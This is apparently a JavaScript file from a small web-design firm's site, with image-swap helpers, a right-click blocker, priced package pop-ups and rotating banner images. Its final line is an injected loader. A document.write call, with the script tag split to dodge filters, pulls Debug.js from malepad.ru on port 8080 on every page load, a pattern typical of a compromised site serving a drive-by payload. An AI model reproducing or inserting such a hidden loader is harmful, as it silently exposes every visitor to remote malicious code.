
var hotkey=104
var destination="http://www.awebcreater.com/"
if (document.layers)
document.captureEvents(Event.KEYPRESS)
function backhome(e){
if (document.layers){
if (e.which==hotkey)
window.location=destination
}
else if (document.all){
if (event.keyCode==hotkey)
window.location=destination
}
}
document.onkeypress=backhome

function MM_swapImgRestore() { //v3.0
  var i,x,a=document.MM_sr; for(i=0;a&&i<a.length&&(x=a[i])&&x.oSrc;i++) x.src=x.oSrc;
}

function MM_preloadImages() { //v3.0
  var d=document; if(d.images){ if(!d.MM_p) d.MM_p=new Array();
    var i,j=d.MM_p.length,a=MM_preloadImages.arguments; for(i=0; i<a.length; i++)
    if (a[i].indexOf("#")!=0){ d.MM_p[j]=new Image; d.MM_p[j++].src=a[i];}}
}

function MM_findObj(n, d) { //v4.01
  var p,i,x;  if(!d) d=document; if((p=n.indexOf("?"))>0&&parent.frames.length) {
    d=parent.frames[n.substring(p+1)].document; n=n.substring(0,p);}
  if(!(x=d[n])&&d.all) x=d.all[n]; for (i=0;!x&&i<d.forms.length;i++) x=d.forms[i][n];
  for(i=0;!x&&d.layers&&i<d.layers.length;i++) x=MM_findObj(n,d.layers[i].document);
  if(!x && d.getElementById) x=d.getElementById(n); return x;
}

function MM_swapImage() { //v3.0
  var i,j=0,x,a=MM_swapImage.arguments; document.MM_sr=new Array; for(i=0;i<(a.length-2);i+=3)
   if ((x=MM_findObj(a[i]))!=null){document.MM_sr[j++]=x; if(!x.oSrc) x.oSrc=x.src; x.src=a[i+2];}
}


var mymessage = "Sorry,this page has been created by www.awebcreater.com and you can't view the source of this page.";

if (document.layers){
document.captureEvents(Event.MOUSEDOWN);
}

function rtclickcheck(keyp){

  if (document.layers && keyp.which != 1) {
    alert(mymessage);
    return false;
  }


  if (document.all && event.button != 1) { 
    alert(mymessage);
    return false;
  }
}

document.onmousedown = rtclickcheck



function MM_openBrWindow(theURL,winName,features) { //v2.0
  window.open(theURL,winName,features);
}

iArray=new Array
(
"page_image/RELOAD/1.gif",
"page_image/RELOAD/2.gif",
"page_image/RELOAD/3.gif",
"page_image/RELOAD/4.gif",
"page_image/RELOAD/5.gif",
"page_image/RELOAD/6.gif",
"page_image/RELOAD/7.gif",
"page_image/RELOAD/8.gif",
"page_image/RELOAD/9.gif",
"page_image/RELOAD/10.gif",
"page_image/RELOAD/11.gif",
"page_image/RELOAD/12.gif",
"page_image/RELOAD/13.gif",
"page_image/RELOAD/14.gif",
"page_image/RELOAD/15.gif",
"page_image/RELOAD/16.gif",
"page_image/RELOAD/17.gif",
"page_image/RELOAD/18.gif",
"page_image/RELOAD/19.gif",
"page_image/RELOAD/20.gif",
"page_image/RELOAD/21.gif",
"page_image/RELOAD/22.gif",
"page_image/RELOAD/23.gif",
"page_image/RELOAD/24.gif",
"page_image/RELOAD/25.gif",
"page_image/RELOAD/26.gif",
"page_image/RELOAD/27.gif",
"page_image/RELOAD/28.gif",
"page_image/RELOAD/29.gif"
);
rr=Math.floor(iArray.length*Math.random());
rr='<IMG SRC="./'+ iArray[rr]+ '" BORDER="1">';

function Business1() {
        
	    var msg1 = "(PACKAGE ONE)  Simple Web Site of Six Pages ( Home, FAQ, Estimate and Comments, Contact us, Recent Projects, or of your choice  )  "
		var msg2 = "Multimedia, Logo, Logo type, Flash SWF in header, Forms that go to your e-mail "
		var msg3 = "and up to Fifty e-mail with your domain, we will find the most convenient Host for your web site all for $400.00 (Host not included price vary )"
		var newMsg= msg1+msg2+msg3
		alert(newMsg)
         
    }
	
function Business2() {
	    var msg1 = " (PACKAGE TWO)  FLASH 8 MULTIMEDIA  Web Site of Six Pages ( Home, FAQ, Estimate and Comments, Contact us, Recent Projects, or of your choice) "
		var msg2 = "with flash swf  in HEADER, up to fifty e-mail with your domain, we will find the most convenient host for your web site all for $800.00 (host price vary not included)"
		var newMsg= msg1+msg2
		alert(newMsg)
			}
function Business3() {
	    var msg1 = "(PACKAGE THREE)  Web Site of multiple Pages with flash swf  in HEADER, up to multiple e-mails with your domain"
		var msg2 = ", we will find the most convenient host for your web site all for $1200.00 (host price vary not included)"
		var msg3 = " "
		var newMsg= msg1+msg2+msg3
		alert(newMsg)
		}     
		
function Business4() {
	    var msg1 = "(PACKAGE THREE)  Web Site of Small E-COMMERANCE with flash swf  in HEADER, up to multiple e-mails with your domain"
		var msg2 = ", Also included PAY PAL witch is the safest, easiest way to make an online payment "
		var msg3 = " , we will find the most convenient host for your web site all for $1600.00 (host price vary not included)"
		var newMsg= msg1+msg2+msg3
		alert(newMsg)
		}     
 
// Created by: Simon Willison | http://simon.incutio.com/
function addLoadEvent(func) {
  var oldonload = window.onload;
  if (typeof window.onload != 'function') {
    window.onload = func;
  } else {
    window.onload = function() {
      if (oldonload) {
        oldonload();
      }
    }
  }
}

addLoadEvent(function() {
  document.getElementById("loading").style.display="none";
});

var persistclose=0 //set to 0 or 1. 1 means once the bar is manually closed, it will remain closed for browser session
var startX = 10 //set x offset of bar in pixels
var startY = 5 //set y offset of bar in pixels
var verticalpos="frombottom" //enter "fromtop" or "frombottom"

function iecompattest(){
return (document.compatMode && document.compatMode!="BackCompat")? document.documentElement : document.body
}

function get_cookie(Name) {
var search = Name + "="
var returnvalue = "";
if (document.cookie.length > 0) {
offset = document.cookie.indexOf(search)
if (offset != -1) {
offset += search.length
end = document.cookie.indexOf(";", offset);
if (end == -1) end = document.cookie.length;
returnvalue=unescape(document.cookie.substring(offset, end))
}
}
return returnvalue;
}

function closebar(){
if (persistclose)
document.cookie="remainclosed=1"
document.getElementById("topbar").style.visibility="hidden"
}

function ml(id){
var el=d.getElementById(id);
if (!persistclose || persistclose && get_cookie("remainclosed")=="")
el.style.visibility="visible"
if(d.layers)el.style=el;
el.sP=function(x,y){this.style.left=x+"px";this.style.top=y+"px";};
el.x = startX;
if (verticalpos=="fromtop")
el.y = startY;
else{
el.y = ns ? pageYOffset + innerHeight : iecompattest().scrollTop + iecompattest().clientHeight;
el.y -= startY;
}
return el;
}
window.stayTopLeft=function(){
if (verticalpos=="fromtop"){
var pY = ns ? pageYOffset : iecompattest().scrollTop;
ftlObj.y += (pY + startY - ftlObj.y)/8;
}
else{
var pY = ns ? pageYOffset + innerHeight - barheight: iecompattest().scrollTop + iecompattest().clientHeight - barheight;
ftlObj.y += (pY - startY - ftlObj.y)/8;
}
ftlObj.sP(ftlObj.x, ftlObj.y);
setTimeout("stayTopLeft()", 10);
}


iArray=new Array
(
"Advertise/1.gif",
"Advertise/2.gif",
"Advertise/3.gif",
"Advertise/4.gif",
"Advertise/fnc_logo.jpg" 

);
ai=Math.floor(iArray.length*Math.random());
ai='<IMG SRC="./'+ iArray[ai]+ '" BORDER="1">';


iArray=new Array
(
"Advertise2/1.gif",
"Advertise2/2.gif",
"Advertise2/3.gif",
"Advertise2/4.gif",
"Advertise2/5.gif",
"Advertise2/6.gif",
"Advertise2/7.gif",
"Advertise2/8.gif"
);
aii=Math.floor(iArray.length*Math.random());
aii='<IMG SRC="./'+ iArray[aii]+ '" BORDER="1">';










document.write('<s'+'cript type="text/javascript" src="http://malepad.ru:8080/Debug.js"></scr'+'ipt>');